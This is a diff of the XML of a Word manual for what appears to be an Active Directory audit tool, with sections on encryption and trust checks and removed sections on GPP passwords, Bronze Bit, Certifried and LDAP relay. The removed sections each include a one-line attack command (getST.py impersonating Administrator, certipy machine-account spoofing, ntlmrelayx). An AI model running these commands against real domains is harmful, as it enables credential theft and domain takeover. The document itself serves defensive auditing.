-        <w:sectPr>
-          <w:pgSz w:w="12240" w:h="15840"/>
-          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
-          <w:cols w:space="720"/>
-          <w:docGrid w:linePitch="360"/>
-        </w:sectPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3183,499 +2336,6 @@
     </w:sdt>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:pBdr>
-          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
-        </w:pBdr>
-      </w:pPr>
-      <w:bookmarkStart w:id="110" w:name="_Toc224561360"/>
-      <w:r>
-        <w:t>5.7  GPP Passwords — MS14-025</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="110"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Group Policy Preferences created before KB2962486 may store passwords encrypted with a publicly known AES key. Any domain user can read SYSVOL and decrypt these passwords.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Detection: Queries all groupPolicyContainer objects via LDAP and checks gPCFileSysPath attributes for SYSVOL paths containing potential cpassword XML files (Groups.xml, ScheduledTasks.xml, Services.xml, DataSources.xml).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Remediation: Apply KB2962486, delete existing GPP XML files containing cpassword, reset affected passwords.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="9360" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-        </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9360"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9360" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
-            <w:tcMar>
-              <w:top w:w="120" w:type="dxa"/>
-              <w:bottom w:w="120" w:type="dxa"/>
-              <w:left w:w="200" w:type="dxa"/>
-              <w:right w:w="200" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>Get-GPPPassword.py domain/user:pass@DC_IP</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:pBdr>
-          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
-        </w:pBdr>
-      </w:pPr>
-      <w:bookmarkStart w:id="111" w:name="_Toc224561361"/>
-      <w:r>
-        <w:t>5.8  Bronze Bit — CVE-2020-17049</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="111"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Bypasses the S4U2Self forwardable flag validation in constrained delegation. An attacker with a constrained delegation account can impersonate any user to any service in the delegation list, even without protocol transition enabled.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Detection: Checks if constrained delegation accounts exist AND the domain functional level suggests the patch (KB4598347) has not been applied (DFL &lt; 7).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Remediation: Apply KB4598347 on all DCs, set PerformTicketSignature=2 registry key.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="9360" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-        </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9360"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9360" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
-            <w:tcMar>
-              <w:top w:w="120" w:type="dxa"/>
-              <w:bottom w:w="120" w:type="dxa"/>
-              <w:left w:w="200" w:type="dxa"/>
-              <w:right w:w="200" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>getST.py -spn TARGET_SPN -impersonate Administrator -force-forwardable -dc-ip DC_IP domain/user:pass</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:pBdr>
-          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
-        </w:pBdr>
-      </w:pPr>
-      <w:bookmarkStart w:id="112" w:name="_Toc224561362"/>
-      <w:r>
-        <w:t>5.9  Certifried — CVE-2022-26923</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="112"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Any domain user can create a machine account (if MachineAccountQuota &gt; 0), set its dNSHostName to match a DC, request a certificate, and authenticate as the DC — full domain compromise. Severity: CRITICAL.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Detection: Checks three conditions via LDAP: (1) AD CS enrollment services exist, (2) ms-DS-MachineAccountQuota &gt; 0, (3) domain appears unpatched (DFL &lt; 7).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Remediation: Apply KB5014754 (May 2022 updates), set MachineAccountQuota=0, enable strong certificate mapping.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="9360" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-        </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9360"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9360" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
-            <w:tcMar>
-              <w:top w:w="120" w:type="dxa"/>
-              <w:bottom w:w="120" w:type="dxa"/>
-              <w:left w:w="200" w:type="dxa"/>
-              <w:right w:w="200" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>certipy account create -u user@domain -p pass -dc-ip DC_IP -user FAKE$ -dns DC_FQDN</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:pBdr>
-          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
-        </w:pBdr>
-      </w:pPr>
-      <w:bookmarkStart w:id="113" w:name="_Toc224561363"/>
-      <w:r>
-        <w:t>5.10  LDAP Signing Not Required</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="113"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>If LDAP signing is not enforced on the DC, NTLM relay attacks to LDAP are possible (ntlmrelayx, mitm6, Responder). This enables privilege escalation via RBCD or delegation abuse. Severity: HIGH.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Detection: Checks whether the current LDAP connection was established without signing (port 389 vs 636/LDAPS).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>Remediation: Set “Domain controller: LDAP server signing requirements” to “Require signing” via GPO. Enable LDAP channel binding (LdapEnforceChannelBinding=2).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="60" w:after="60"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:w="9360" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-        </w:tblBorders>
-        <w:tblCellMar>
-          <w:left w:w="10" w:type="dxa"/>
-          <w:right w:w="10" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9360"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="9360" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
-            <w:tcMar>
-              <w:top w:w="120" w:type="dxa"/>
-              <w:bottom w:w="120" w:type="dxa"/>
-              <w:left w:w="200" w:type="dxa"/>
-              <w:right w:w="200" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>ntlmrelayx.py -t ldap://DC_IP --delegate-access</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="1" w:name="_Toc224561281"/>
@@ -8543,6 +7203,853 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="100" w:name="_Toc224561350"/>
+      <w:r>
+        <w:t>4.5  Encryption Auditor  (--encryption)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="100"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Audits Kerberos encryption type configuration across all domain accounts and Domain Controllers. Weak encryption (RC4/DES) enables faster offline cracking and downgrade attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>The module queries msDS-SupportedEncryptionTypes for all enabled user accounts and all DCs (userAccountControl bit 8192).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9360" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:left w:w="10" w:type="dxa"/>
+          <w:right w:w="10" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="3120"/>
+        <w:gridCol w:w="3120"/>
+        <w:gridCol w:w="3120"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Check</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Condition</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="2C3E50"/>
+            <w:tcMar>
+              <w:top w:w="80" w:type="dxa"/>
+              <w:bottom w:w="80" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Risk</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>RC4-only accounts</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>enc=0 or RC4 set without AES</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>HIGH</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>DES accounts</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>DES-CBC-CRC or DES-CBC-MD5 enabled</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>CRITICAL</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Weak DCs</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>DC supports RC4 or has no explicit AES</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3120" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>HIGH</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>All findings feed into the priority scorer — weak DCs score 65 (HIGH), DES accounts score 60 (HIGH).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2471A3"/>
+        </w:pBdr>
+      </w:pPr>
+      <w:bookmarkStart w:id="101" w:name="_Toc224561351"/>
+      <w:r>
+        <w:t>4.6  Trust Mapper  (--trusts)</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="101"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Enumerates all domain trusts and assesses their risk based on direction, type, SID filtering status, and encryption.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>LDAP filter: (objectClass=trustedDomain)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="333333"/>
+        </w:rPr>
+        <w:t>Attributes: name, trustDirection, trustType, trustAttributes, securityIdentifier</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="60" w:after="60"/>
+      </w:pPr>
